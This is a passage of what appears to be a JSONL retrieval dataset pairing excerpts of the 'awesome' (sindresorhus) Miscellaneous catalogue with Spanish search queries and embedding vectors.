-0.01662, -0.03133, -0.04656, 0.0218, 0.06919, 0.00113, 0.03713, -0.04757, 0.06167, -0.00842, -0.01707, 0.05457, 0.02723, -0.00965, -0.10619, 0.07149, 0.00642, -0.02654, 0.00922, 0.02544, -0.03116, 0.02406, -0.02476, -0.00345, 0.00296, 0.03125, -0.00336, -0.00622, -0.02198, 0.02278, 0.00275, -0.0439, -0.05685, 0.04249, 0.02871, 0.01839, -0.01674, -0.07334, -0.09393, -0.0097, 0.0591, 0.02933, -0.04631, -0.0604, -0.07737, -0.064, 0.02149, -0.01419, -0.08357, -0.05257, 0.07013, 0.11032, -0.0276, 0.0174, -0.02848]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Scientific Writing β€” Distraction-free scientific writing with Markdown, reStructuredText and Jupyter notebooks. JSON β€” Text based data interchange format. GeoJSON. CSV β€” A text file format that stores tabular data and uses a comma to separate values. Discounts for Student Developers. Radio. Awesome β€” Recursion illustrated. Analytics. REST. Continuous Integration and Continuous Delivery. Services Engineering. Free for Developers. Sketch β€” Design app for macOS. Boilerplate Projects. Readme. GitHub Wiki β€” Comprehensive documentation on GitHub beyond README. Design and Development Guides. Software Engineering Blogs. Self Hosted. FOSS Production Apps. Gulp β€” Task runner. AMA β€” Ask Me Anything. Answers. Open Source Photography. OpenGL β€” Cross-platform API for rendering 2D and 3D graphics. GraphQL. Urban & Regional Planning β€” Concerning the built environment and communities. Transit β€” Data standards, APIs, apps, tools, datasets, and research around open source technology of public transit. Research Tools. Data Visualization. Microservices.", "indexar": "que programa sirve para escribir documentos cientΓ­ficos sin distracciones?", "v": [-0.11316, 0.01872, -0.10242, -0.24085, 0.10369, -0.20695, -0.07877, -0.10412, 0.06835, -0.16656, 0.00566, -0.09565, -0.01499, -0.19334, 0.02376, -0.06201, 0.20802, 0.00853, 0.06796, -0.05739, 0.00234, -0.10184, 0.04286, -0.06379, -0.03066, -0.12592, -0.0367, -0.00781, -0.03611, 0.05565, -0.0082, 0.1103, 0.0566, -0.08599, -0.02422, 0.09487, 0.00837, -0.04672, -0.04045, 0.11602, -0.02298, 0.03559, -0.06759, 0.0723, -0.05203, 0.04371, -0.0026, 0.06706, -0.08125, 0.01372, -0.08292, 0.01222, 0.05834, -0.00339, -0.03395, -0.01116, -0.01687, -0.1178, -0.03402, 0.00466, -0.02148, 0.07133, -0.05531, -0.05462, 0.04499, -0.05822, 0.12363, -0.07214, -0.10978, 0.05171, -0.01771, -0.06236, 0.11891, -0.02651, -0.0495, 0.03327, -0.13305, -0.01735, 0.03225, 0.03695, -0.08325, 0.00838, -0.01185, 0.02101, 0.01704, -0.06152, 0.06848, -0.05061, -0.05793, 0.06381, 0.02157, 0.07888, 0.06016, 0.04595, 0.08502, -0.02516, 0.1765, -0.03268, 0.05704, 0.15818, 0.02636, 0.01345, 0.01597, 0.05332, -0.0978, 0.11383, 0.03072, 0.0175, -0.02075, 0.04654, -0.03065, -0.0022, -0.02766, 0.01695, -0.02356, 0.04251, -0.01537, 0.04404, -0.01205, -0.08285, -0.04583, 0.03017, -0.04819, 0.01521, 0.10171, -0.03544, -0.02077, 0.02771, 0.03492, 0.09362, 0.04304, -0.00878, -0.06184, -0.00876, -0.02739, -0.06019, 0.04327, -0.06063, -0.02704, -0.01428, 0.10012, -0.00742, -0.06721, 0.0118, -0.00725, 0.00679, 0.01551, -0.01165, -0.00811, 0.01721, -0.05266, 0.00722, 0.03821, 0.05716, -0.05179, -0.00167, 0.06312, -0.00231, -0.13551, -0.01097, -0.0651, 0.04497, 0.0089, 0.01594, 0.08392, -0.03906, -0.05883, -0.01587, 0.02482, 0.08973, -0.0797, 0.03866, 0.04209, -0.12147, 0.04148, -0.02672, -0.01656, 0.068, 0.01065, -0.04886, -0.0886, 0.04043, -0.03275, 0.00464, -0.03218, -0.01412, 0.05093, -0.03439, 0.03958, -0.05439, -0.04485, 0.03444, -0.03348, -0.0373, -0.00353, -0.05368, -0.03494, -0.03057, 0.13291, -0.03856, 0.01802, -0.01968, -0.00924, 0.04214, 0.02853, 0.1145, -0.05945, 0.01414, -0.04202, 0.04246, 0.02542, -0.04205, 0.00921, 0.05365, -0.12181, -0.06314, 0.02329, 0.06315, 0.0341, 0.06351, 0.07769, -0.03432, 0.01374, -0.00483, 0.00282, -0.07074, 0.09649, 0.03902, 0.01744, 0.03594, 0.01311, -0.01697, 0.02166, 0.01785, 0.01365, 0.04397, -0.03689, -0.05718, -0.01127, -0.03555, -0.01467, 0.05125, 0.00776, -0.06088, -0.04117, 0.03189, -0.03249, 0.0227, 0.01922, -0.01449, -0.00513, -0.03579, 0.05854, -0.0319, 0.09283, 0.02222]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Scientific Writing β€” Distraction-free scientific writing with Markdown, reStructuredText and Jupyter notebooks. JSON β€” Text based data interchange format. GeoJSON. CSV β€” A text file format that stores tabular data and uses a comma to separate values. Discounts for Student Developers. Radio. Awesome β€” Recursion illustrated. Analytics. REST. Continuous Integration and Continuous Delivery. Services Engineering. Free for Developers. Sketch β€” Design app for macOS. Boilerplate Projects. Readme. GitHub Wiki β€” Comprehensive documentation on GitHub beyond README. Design and Development Guides. Software Engineering Blogs. Self Hosted. FOSS Production Apps. Gulp β€” Task runner. AMA β€” Ask Me Anything. Answers. Open Source Photography. OpenGL β€” Cross-platform API for rendering 2D and 3D graphics. GraphQL. Urban & Regional Planning β€” Concerning the built environment and communities. Transit β€” Data standards, APIs, apps, tools, datasets, and research around open source technology of public transit. Research Tools. Data Visualization. Microservices.", "indexar": "cual es una alternativa libre a Microsoft Excel para manejar datos tabulares?", "v": [-0.06781, -0.05051, 0.02666, -0.11278, -0.076, -0.05589, -0.06119, -0.09008, -0.17273, -0.01292, -0.14158, -0.18322, 0.06771, -0.03352, 0.04286, -0.00704, 0.08592, -0.07224, 0.04408, -0.07195, 0.05622, -0.02657, -0.13359, -0.12759, -0.0903, 0.02222, -0.08176, 0.00952, -0.12442, 0.04269, 0.03428, -0.01863, -0.11024, -0.03515, 0.05495, 0.16701, 0.00122, 0.12967, -0.03246, -0.20733, -0.00552, 0.04126, -0.1529, 0.08053, 0.07371, -0.07843, -0.05801, 0.11335, -0.00719, 0.00181, -0.04533, -0.03069, -0.03466, 0.02028, 0.05224, -0.07187, 0.14555, -0.05597, 0.03899, 0.00702, -0.03182, 0.01997, -0.04817, 0.02944, -0.10261, 0.01871, 0.07287, -0.05631, 0.00234, 0.12295, -0.00576, -0.01221, 0.01583, -0.08654, -0.00468, -0.10031, 0.03997, -0.00826, -0.02269, 0.0904, -0.07427, -0.06186, -0.10054, 0.07692, 0.00492, -0.08606, 0.04763, -0.07675, -0.03878, -0.0248, 0.097, -0.02085, -0.08883, 0.08728, 0.0946, -0.05331, -0.01423, 0.00203, 0.03907, 0.07612, 0.03752, 0.06259, -0.15995, 0.11203, -0.03205, 0.07767, -0.02895, 0.04462, -0.16027, 0.02495, 0.02303, -0.01948, -0.01598, -0.01832, 0.0824, -0.05949, -0.01118, 0.02203, -0.04008, -0.01502, 0.01565, -0.05393, -0.0132, -0.02546, -0.05428, -0.10316, 0.01106, 0.1103, -0.03014, 0.08654, 0.03086, -0.06205, -0.10221, -0.03703, -0.0159, -0.001, 0.02206, -0.08994, 0.02597, -0.05945, 0.05128, 0.03796, -0.01283, -0.03468, 0.01026, -0.0323, 0.0841, 0.13386, -0.03542, -0.03652, -0.01219, 0.02025, 0.01937, 0.11768, -0.04436, -0.01275, -0.01751, 0.04224, 0.01958, 0.02559, 0.03114, 0.01179, -0.00867, 0.05968, -0.00099, -0.01522, 0.02463, 0.01341, 0.01747, -6e-05, -0.03444, 0.06696, 0.07365, -0.10426, 0.0526, -0.09212, -0.09164, -0.08851, 0.02564, -0.03285, -0.0112, -0.00576, -0.0387, -0.03883, -0.05862, -0.0322, 0.01006, -0.01063, -0.00735, 0.02761, -0.08488, 0.08119, 0.00165, -0.13568, 0.01469, -0.02892, -0.02026, -0.07789, 0.05178, -0.0342, -0.04171, 0.03091, -0.0444, -0.02119, 0.03928, 0.05927, -0.0324, 0.04372, 0.03873, 0.00657, -0.01543, 0.04282, 0.03644, 0.01155, -0.0457, -0.06218, 0.08878, -0.03044, 0.03983, -0.00142, -0.00384, 0.04137, 0.04214, -0.05412, -0.02871, 0.03109, -0.00953, 0.02144, -0.05622, 0.02329, 0.06631, -0.00958, -0.00041, 0.02961, 0.04908, 0.01348, 0.00458, -0.02433, 0.03106, -0.04862, 0.04886, 0.08735, -0.0561, -0.07156, -0.06335, -0.00087, -0.08716, -0.0153, -0.01564, -0.04276, -0.00496, 0.00677, 0.02098, -0.00093, 0.00132, -0.01051]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Scientific Writing β€” Distraction-free scientific writing with Markdown, reStructuredText and Jupyter notebooks. JSON β€” Text based data interchange format. GeoJSON. CSV β€” A text file format that stores tabular data and uses a comma to separate values. Discounts for Student Developers. Radio. Awesome β€” Recursion illustrated. Analytics. REST. Continuous Integration and Continuous Delivery. Services Engineering. Free for Developers. Sketch β€” Design app for macOS. Boilerplate Projects. Readme. GitHub Wiki β€” Comprehensive documentation on GitHub beyond README. Design and Development Guides. Software Engineering Blogs. Self Hosted. FOSS Production Apps. Gulp β€” Task runner. AMA β€” Ask Me Anything. Answers. Open Source Photography. OpenGL β€” Cross-platform API for rendering 2D and 3D graphics. GraphQL. Urban & Regional Planning β€” Concerning the built environment and communities. Transit β€” Data standards, APIs, apps, tools, datasets, and research around open source technology of public transit. Research Tools. Data Visualization. Microservices.", "indexar": "con que puedo crear aplicaciones de diseΓ±o para macOS?", "v": [-0.04367, 0.05668, -0.04886, -0.2069, -0.04968, -0.03872, -0.15641, 0.12123, -0.08623, 0.02413, -0.05504, -0.14908, -0.04335, -0.11222, -0.06836, -0.03385, 0.07768, -0.10436, -0.01117, 0.06209, 0.05623, 0.00279, -0.22913, -0.04986, -0.00728, 0.08036, -0.01684, -0.07124, -0.15159, 0.00419, -0.02758, -0.00126, 0.03037, -0.02211, -0.13818, -0.13226, -0.04187, -0.13868, -0.02468, 0.13223, -0.02493, 0.01383, -0.04932, 0.11586, 0.01938, 0.00688, 0.12547, 0.05385, -0.14214, -0.02352, -0.02802, -0.15313, -0.05406, 0.1296, 0.03328, -0.11651, 0.09557, -0.13798, 0.04919, 0.01241, -0.11969, 0.08029, -0.04224, -0.01295, 0.09528, -0.04491, -0.02479, 0.04194, -0.00682, 0.01313, -0.01511, 0.00157, -0.00547, -0.02495, 0.15519, 0.03838, 0.00744, -0.08685, 0.05215, -0.00781, -0.07367, 0.01932, -0.05189, -0.00455, -0.00584, 0.01178, -0.01379, 0.07995, 0.08957, 0.0112, 0.03414, 0.00812, -0.05451, -0.02556, -0.01403, -0.05622, 0.09388, -0.01274, 0.04804, 0.07407, -0.09506, -0.06252, -0.08482, -0.01432, -0.11186, 0.01413, 0.05654, -0.05697, -0.03293, -0.00845, 0.03274, -0.09454, 0.06642, 0.01189, -0.08297, -0.05822, 0.05352, -0.09998, -0.00916, -0.01645, -0.03049, -0.06827, 0.02712, -0.00827, 0.06635, 0.01801, 0.02427, 0.08206, -0.06156, 0.06741, 0.00099, -0.09754, -0.08359, 0.02878, -0.10218, 0.01959, -0.01912, -0.00837, -0.0172, -0.01323, 0.02683, 0.07136, -0.02343, -0.00913, -0.02421, -0.01974, -0.03075, -0.02704, 0.00566, -0.02747, 0.06592, -0.00228, -0.035, -0.08388, -0.13782, 0.07128, -0.06774, -0.00319, 0.05733, 0.04813, -0.07049, 0.08714, -0.07485, 0.0067, -0.05554, -0.0632, -0.01511, -0.00898, 0.07226, 0.06515, -0.0365, 0.06404, 0.04236, -0.09483, 0.03829, -0.03393, 0.01443, -0.04256, 0.00755, -0.06834, -0.04948, -0.03155, -0.03369, 0.03415, -0.00583, -0.08608, 0.04944, 0.03567, 0.01566, 0.04882, -0.0662, 0.09601, 0.04643, -0.00596, 0.01307, -0.01141, 0.09883, -0.03736, -0.08041, -0.03554, -0.05824, 0.00273, -0.02172, 0.00493, 0.04575, 0.02772, -0.03425, 0.0997, -0.0189, 0.06747, 0.00139, -0.01546, 0.05473, 0.02542, -0.00227, 0.00568, 0.07793, 0.02405, 0.02529, 0.02158, -0.00498, 0.00835, -0.03201, 0.00748, 0.05595, -0.00018, -0.0288, 0.0098, -0.0062, -0.03491, 0.06006, -0.03919, -0.03752, -0.05177, 0.02619, 0.02849, 0.02219, -0.0088, -0.0267, 0.0023, -0.03643, 0.07244, 0.02728, -0.01296, -0.0312, -0.05705, -0.02647, -0.03132, -0.08151, -0.05705, -0.00897, 0.0521, 0.06635, -0.0383, 0.02776, 0.03932]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Unicode β€” Standards, quirks, packages and resources for Unicode. Code Points. Beginner-Friendly Projects. Katas. Tools for Activism. Citizen Science β€” For community-based and non-institutional scientists. MQTT β€” \"Internet of Things\" connectivity protocol. For Girls. Vorpal β€” Node.js CLI framework. Vulkan β€” Low-overhead, cross-platform 3D graphics and compute API. LaTeX β€” Typesetting language. Economics β€” An economist's starter kit. Funny Markov Chains. Bioinformatics. Cheminformatics β€” Informatics techniques applied to problems in chemistry. Colorful β€” Choose your next color scheme. Steam β€” Digital distribution platform. Bots β€” Building bots. Site Reliability Engineering. DTrace β€” Dynamic tracing framework. Userscripts β€” Enhance your browsing experience. PokΓ©mon β€” Resources for PokΓ©mon and PokΓ©mon GO. ChatOps β€” Managing technical and business operations through a chat. Falsehood β€” Falsehoods programmers believe in.", "indexar": "quΓ© herramienta sirve para trazar el comportamiento de mis aplicaciones en tiempo real?", "v": [-0.08061, 0.16443, -0.07771, -0.18843, 0.06547, -0.12883, -0.09172, 0.00527, 0.0444, 0.0485, -0.01824, -0.11393, 0.01847, -0.01735, 0.10388, 0.03498, 0.07104, -0.08829, -0.00804, 0.03203, -0.0143, -0.05627, -0.14501, -0.04759, -0.08558, 0.08545, 0.03445, -0.07396, -0.20095, 0.04069, -0.00505, 0.02463, 0.0867, -0.12929, -0.14869, -0.07406, -0.02179, 0.02115, -0.08136, 0.07744, 0.01123, 0.00337, -0.03713, 0.06085, 0.01597, 0.02527, -0.07544, 0.0114, -0.1187, 0.05913, -0.0549, -0.05773, -0.03309, 0.0614, 0.00663, -0.15166, 0.09995, -0.15843, 0.07094, -0.12229, -0.1655, -0.0092, -0.0105, -0.01709, 0.04439, -0.06731, 0.06862, 0.02744, -0.07536, 0.00366, -0.05091, 0.0746, 0.0101, 0.01028, 0.04152, 0.03559, -0.0286, 0.03107, -0.00797, -0.02999, 0.03736, -0.00913, -0.11422, 0.05601, -0.02224, -0.0658, 0.17113, -0.05969, 0.07033, -0.05097, -0.03795, 0.15364, -0.02799, -0.01098, 0.00063, -0.00953, 0.05684, -0.04509, 0.0816, 0.08528, 0.11547, -0.11981, -0.10455, -0.02883, -0.08542, 0.07312, -0.02161, -0.05985, -0.0603, -0.04937, 0.01162, -0.0944, -0.01715, 0.03662, 0.01907, 0.07593, 0.00353, -0.12769, -0.00614, -0.08595, -0.05733, -0.01808, -0.00859, -0.04909, -0.00755, 0.02105, 8e-05, 0.00747, 0.01187, -0.02079, -0.00119, -0.104, -0.09421, 0.02711, -0.04894, -0.08399, 0.02161, -0.02548, -0.00623, -0.09015, 0.07999, 0.04048, -0.03416, -0.04653, 0.03167, -0.02069, 0.01643, 0.00068, -0.03451, -0.0118, 0.09482, -0.05202, 0.02929, 0.02998, -0.0337, -0.0383, -0.06612, -0.01261, -0.07793, 0.02335, -0.00503, -0.0438, -0.03743, -0.0284, 0.01094, -0.08288, 0.06908, 0.07244, 0.07801, 0.09865, 0.04639, 0.05199, 0.10491, -0.09051, 0.01159, -0.03996, -0.01543, -0.00206, -0.00625, -0.09941, -0.04941, -0.02187, 0.05348, 0.02139, 0.0181, -0.06329, 0.00065, -0.01397, 0.00283, 0.02582, -0.03751, 0.03584, 0.0735, -0.00685, 0.03795, 0.00013, 0.02259, -0.056, -0.00059, -0.03667, -0.01462, -0.07437, -0.00717, 0.01344, 0.04551, 0.10611, -0.00716, 0.05778, -0.0066, 0.07819, -0.01797, 0.03168, 0.0445, 0.05526, -0.02028, -0.07128, 0.02746, 0.05722, -0.02623, 0.02003, 0.02861, -0.04709, 0.01315, -0.01606, -0.07832, 0.05674, 0.00599, 0.0118, -0.02399, -0.00815, 0.02608, -0.03946, -0.02247, -0.02963, 0.01793, -0.04766, 0.05944, -0.03481, -0.04273, -0.09885, -0.03763, 0.06123, 0.01444, -0.05426, -0.0562, -0.01766, -0.02866, -0.03872, -0.01185, -0.05934, -0.06385, 0.00868, 0.0997, -0.04052, 0.03979, -0.04444]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Unicode β€” Standards, quirks, packages and resources for Unicode. Code Points. Beginner-Friendly Projects. Katas. Tools for Activism. Citizen Science β€” For community-based and non-institutional scientists. MQTT β€” \"Internet of Things\" connectivity protocol. For Girls. Vorpal β€” Node.js CLI framework. Vulkan β€” Low-overhead, cross-platform 3D graphics and compute API. LaTeX β€” Typesetting language. Economics β€” An economist's starter kit. Funny Markov Chains. Bioinformatics. Cheminformatics β€” Informatics techniques applied to problems in chemistry. Colorful β€” Choose your next color scheme. Steam β€” Digital distribution platform. Bots β€” Building bots. Site Reliability Engineering. DTrace β€” Dynamic tracing framework. Userscripts β€” Enhance your browsing experience. PokΓ©mon β€” Resources for PokΓ©mon and PokΓ©mon GO. ChatOps β€” Managing technical and business operations through a chat. Falsehood β€” Falsehoods programmers believe in.", "indexar": "con quΓ© puedo crear un lenguaje o protocolo propio para conectarme al internet de las cosas con baja sobrecarga?", "v": [-0.00642, 0.1624, -0.15851, -0.14479, -0.13403, -0.04011, 0.02815, 0.02133, -0.17291, -0.06728, -0.05676, 0.00578, 0.02512, -0.02744, 0.02887, 0.04332, 0.09308, -0.00177, 0.08281, -0.12211, 0.03291, 0.01243, -0.10216, -0.04217, 0.02898, -0.08323, 0.08245, -0.01306, -0.10898, 0.05724, -0.10378, 0.05265, 0.13393, 0.05419, -0.04348, 0.07351, 0.05674, 0.22942, 0.04122, 0.0914, 0.01429, 0.02367, -0.09144, 0.09889, 0.04206, 0.01013, 0.06168, -0.07578, 0.03783, -0.04264, -0.05035, -0.0058, -0.08539, -0.05644, -0.11132, 0.05701, 0.13374, -0.15581, 0.04549, -0.1003, -0.0729, 0.02529, 0.03355, -0.03457, 0.0248, -0.00522, 0.00427, -0.02216, -0.04103, 0.03258, 0.08726, -0.0376, -0.10734, -0.06731, 0.15189, 0.06683, -0.08274, -0.04207, 0.06761, 0.0223, 0.00139, -0.03551, 0.03864, 0.01018, -0.09582, 0.01099, -0.02018, -0.08117, 0.02904, -0.06924, 0.0166, 0.03448, -0.08558, -0.21506, -0.00306, -0.04973, -0.01686, -0.0836, 0.04623, 0.103, 0.01865, 0.04014, -0.12015, 0.10225, 0.01237, -0.00474, 0.09942, -0.04357, 0.01045, -0.0409, 0.00644, 0.00559, -0.00287, -0.10167, -0.07494, -0.02661, 0.02148, -0.00257, -0.03019, 0.0379, 0.00031, 0.00599, 0.0276, 0.04846, 0.00016, 0.03054, 0.02521, 0.13928, 0.04356, 0.06168, -0.02736, -0.0012, 0.03097, -0.11948, -0.04706, 0.0449, 0.01199, -0.08337, -0.04285, -0.01571, 0.00886, -0.02303, -0.11924, 0.01376, 0.06084, -0.01954, 0.02357, -0.08211, -0.1417, 0.08649, -0.03999, 0.11317, -0.02048, 0.01181, -0.07229, 0.01157, -0.01069, 0.01248, 0.02231, 0.03468, -0.04262, -0.00955, -0.00071, -0.01649, 0.0097, 0.03977, -0.17358, -0.01943, 0.11716, 0.04681, -0.02145, -0.02919, 0.01041, -0.03068, -0.04774, 0.01703, -0.04589, -0.01875, -0.02334, -0.06388, -0.08829, -0.0154, -0.05668, -0.01522, 0.00828, -0.02009, 0.01441, -0.00176, -0.05585, -0.01799, -0.07843, 0.0339, -0.02088, 0.0266, 0.00821, -0.06462, 0.00327, -0.03598, 0.04336, -0.03171, -0.00642, -0.04846, 0.05972, -0.00154, -0.02474, 0.04773, -0.02141, -0.06258, -0.0067, 0.11129, 0.05464, -0.065, 0.02772, -0.05022, -0.0641, 0.05425, -0.06452, -0.03159, 0.00691, -0.02317, 0.04568, 0.00474, 0.03155, 0.01859, 0.01208, 0.00223, -0.03177, 0.00395, 0.03682, 0.01435, -0.02239, -0.0529, -0.01245, -0.05603, 0.00197, 0.05076, -0.02893, -0.01157, -0.03475, 0.03758, -0.02904, 0.05725, -0.0581, -0.06014, 0.00883, -0.05027, -0.08013, 0.02465, -0.01518, -0.05555, -0.0236, -0.01092, 0.03935, -0.00657, 0.02893, 0.02638]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Unicode β€” Standards, quirks, packages and resources for Unicode. Code Points. Beginner-Friendly Projects. Katas. Tools for Activism. Citizen Science β€” For community-based and non-institutional scientists. MQTT β€” \"Internet of Things\" connectivity protocol. For Girls. Vorpal β€” Node.js CLI framework. Vulkan β€” Low-overhead, cross-platform 3D graphics and compute API. LaTeX β€” Typesetting language. Economics β€” An economist's starter kit. Funny Markov Chains. Bioinformatics. Cheminformatics β€” Informatics techniques applied to problems in chemistry. Colorful β€” Choose your next color scheme. Steam β€” Digital distribution platform. Bots β€” Building bots. Site Reliability Engineering. DTrace β€” Dynamic tracing framework. Userscripts β€” Enhance your browsing experience. PokΓ©mon β€” Resources for PokΓ©mon and PokΓ©mon GO. ChatOps β€” Managing technical and business operations through a chat. Falsehood β€” Falsehoods programmers believe in.", "indexar": "cuΓ‘l es una alternativa libre a los programas de ciencias informΓ‘ticas que se centran en la quΓ­mica y la biologΓ­a?", "v": [0.10785, -0.10685, 0.15613, -0.06634, -0.00611, -0.24454, -0.10094, -0.07282, -0.07103, -0.08744, 0.11279, -0.08192, -0.0665, 0.07377, 0.07251, -0.0952, 0.10275, -0.09698, 0.03441, -0.05383, -0.08535, -0.05243, -0.13165, -0.00391, -0.11273, 0.04437, -0.04719, -0.05553, -0.06077, 0.1029, 0.00305, 0.03667, 0.14617, -0.02811, -0.10316, 0.1363, 0.06855, -0.0199, 0.04884, 0.02384, -0.12817, -0.074, 0.03494, 0.08459, 0.02902, 0.01737, -0.0461, 0.03971, 0.03946, -0.06242, -0.11323, 0.0256, -0.03412, -0.1136, 0.05747, -0.04007, 0.00058, -0.0897, 0.02077, -0.02859, -0.03488, 0.13217, 0.0442, 0.04034, 0.08097, 0.00404, -0.01385, -0.04369, -0.02962, 0.06728, 0.05649, -0.0683, 0.00226, -0.07199, -0.0791, 0.02463, -0.09823, 0.10557, 0.07644, -0.00163, -0.10163, 0.04505, 0.03018, 0.03452, 0.00026, -0.13564, 0.08189, 0.00944, -0.01263, -0.01898, -0.02958, 0.05581, -0.05744, 0.11168, 0.0975, -0.0455, 0.03661, 0.0514, -0.01448, 0.13744, 0.05038, -0.01928, -0.0773, 0.05028, -0.0594, 0.05689, -0.00304, -0.03193, -0.05987, 0.04963, 0.01036, 0.08224, -0.00696, -0.08067, -0.04041, 0.06964, 0.09664, 0.0389, -0.10265, -0.01821, -0.06101, 0.04016, -0.00351, -0.03055, 0.07587, 0.03863, 0.0866, 0.03522, 0.01019, 0.02044, 0.01179, -0.01093, -0.08653, -0.08391, -0.02433, -0.06417, 0.03852, -0.09633, -0.04376, 0.03631, 0.03929, 0.09413, -0.02776, 0.02222, -0.01429, -0.02907, 0.00263, -0.0401, -0.03634, -0.03083, -0.06471, 0.03333, 0.04082, 0.12648, -0.12882, 0.07038, -0.0761, -0.03309, -0.02196, 0.02567, -0.05676, 0.0324, -0.06472, -0.06063, -0.06369, 0.05332, -0.02455, -0.06943, -0.02884, 0.01138, -0.00905, 0.04766, -0.00244, -0.12711, 0.01982, -0.00058, 0.09232, -0.00313, -0.00823, -0.07434, -0.0363, 0.04133, -0.00055, 0.00334, -0.00369, -0.03799, -0.06997, 0.05375, 0.00489, 0.01116, -0.04477, 0.01998, -0.06708, 0.01217, 0.01552, -0.00323, -0.02218, -0.05738, 0.01774, -0.0104, 0.03168, 0.00961, 0.01059, 0.00369, -0.02827, 0.10734, -0.01632, 0.00765, -0.09848, 0.03408, -0.04398, -0.06342, -0.00252, 0.01429, -0.07236, -0.07397, 0.05012, 0.08782, 0.03731, 0.0302, 0.05778, 0.02251, 0.02629, 0.03834, 0.02473, -0.05766, 0.01786, 0.01406, 0.02387, 0.00718, -0.0192, -0.04489, 0.09963, -0.00483, 0.00424, 0.03531, -0.01218, -0.00347, -0.01026, -0.00909, 0.01328, 0.09275, -0.02214, -0.08638, -0.05309, 0.03188, -0.11397, -0.00716, 0.02512, -0.0194, -0.05494, -0.0072, 0.00311, 0.05573, 0.00287, 0.12483]} -{"tipo": "pregunta", "herramienta": "Miscellaneous", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Miscellaneous", "tema": "miscellaneous", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Miscellaneous: Domain-Driven Design β€” Software development approach for complex needs by connecting the implementation to an evolving model. Quantified Self β€” Self-tracking through technology. Web Design β€” For digital designers. Creative Coding β€” Programming something expressive instead of something functional. No-Login Web Apps β€” Web apps that work without login. Free Software β€” Free as in freedom. Framer β€” Prototyping interactive UI designs. Markdown β€” Markup language. Dev Fun β€” Funny developer projects. Magento 2 β€” Open Source eCommerce built with PHP. TikZ β€” Graph drawing packages for TeX/LaTeX/ConTeXt. Ad-Free β€” Alternatives without ads. Prometheus β€” Open-source monitoring system. Homematic β€” Smart home devices. Ledger β€” Double-entry accounting on the command-line. Web Monetization β€” A free open web standard service that allows you to send money directly in your browser. Uncopyright β€” Public domain works. Crypto Currency Tools & Algorithms β€” Digital currency where encryption is used to regulate the generation of units and verify transfers.", "indexar": "que enfoque de desarrollo de software conecta la implementaciΓ³n con un modelo en evoluciΓ³n para necesidades complejas?", "v": [0.07943, 0.07167, -0.1548, -0.2419, 0.07614, -0.07967, -0.07643, 0.05141, -0.0658, -0.03479, -0.05455, -0.06793, -0.09451, -0.0778, -0.03007, -0.05351, 0.02222, -0.1713, -0.10394, 0.0062, -0.059, -0.00291, -0.10317, -0.07674, -0.01802, 0.04816, -0.03048, -0.04721, -0.01296, -0.03162, 0.04307, -0.01214, 0.0199, 0.09411, -0.05892, -0.05138, -0.12857, -0.04131, 0.03407, -0.04534, -0.01565, -0.1069, 0.04408, 0.02158, 0.1162, 0.02431, 0.09075, -0.01174, -0.0353, 0.02089, -0.12802, 0.1359, -0.03039, -0.05256, 0.10968, -0.08393, 0.03324, -0.07184, 0.10002, 0.01454, -0.11015, 0.10466, -0.01081, -0.08906, 0.05976, -0.17193, -0.03634, -0.01394, -0.11937, 0.02471, 0.0301, 0.03184, -0.00645, -0.03301, 0.04475, 0.05068, 0.00111, -0.0189, -0.06572, 0.08093, 0.03894, -0.0313, -0.12843, 0.09642, -0.06943, -0.01268, 0.13767, 0.01537, 0.03055, -0.01267, -0.00689, -0.06963, -0.02322, -0.00305, -0.01452, -0.06123, 0.04855, 0.00782, 0.08839, 0.05551, -0.09429, -0.02328, 0.00243, 0.08431, -0.10051, 0.02377, 0.14419, -0.04856, -0.08807, -0.03111, -0.04677, 0.07064, 0.1268, -0.04013, -0.04501, -0.02957, 0.01403, 0.00374, -0.0433, -0.0912, 0.00089, -0.01715, -0.02304, -0.08956, -0.06927, 0.0026, -0.10332, 0.12921, 0.0555, 0.00904, -0.04247, -0.09363, 0.0337, 0.00442, 0.00343, 0.05519, 0.06422, -0.00792, 0.02248, -0.01735, 0.03207, -0.00472, 0.03377, -0.02791, 0.04686, -0.05522, 0.00936, -0.03901, -0.06213, 0.0572, -0.00839, 0.00121, 0.06381, 0.01703, -0.16474, -0.01212, -0.01749, 0.01008, 0.05973, 0.03968, -0.01788, 0.02886, -0.01686, -0.03945, 0.05971, -0.06333, -0.00271, 0.02516, 0.07256, 0.01541, -0.00179, 0.00648, 0.02503, -0.03279, -0.00618, -0.02605, -0.04509, -0.06605, -0.03487, -0.05318, -0.11853, 0.11993, -0.01341, 0.00951, 0.02151, -0.06668, -0.07725, -0.05538, -0.00274, -0.01261, 0.01943, 0.0247, 0.02091, -0.07517, 0.03017, -0.02795, -0.07871, -0.00733, -0.01726, -0.01224, -0.01895, -0.03857, 0.01557, -0.02007, 0.00218, 0.10836, -0.02493, 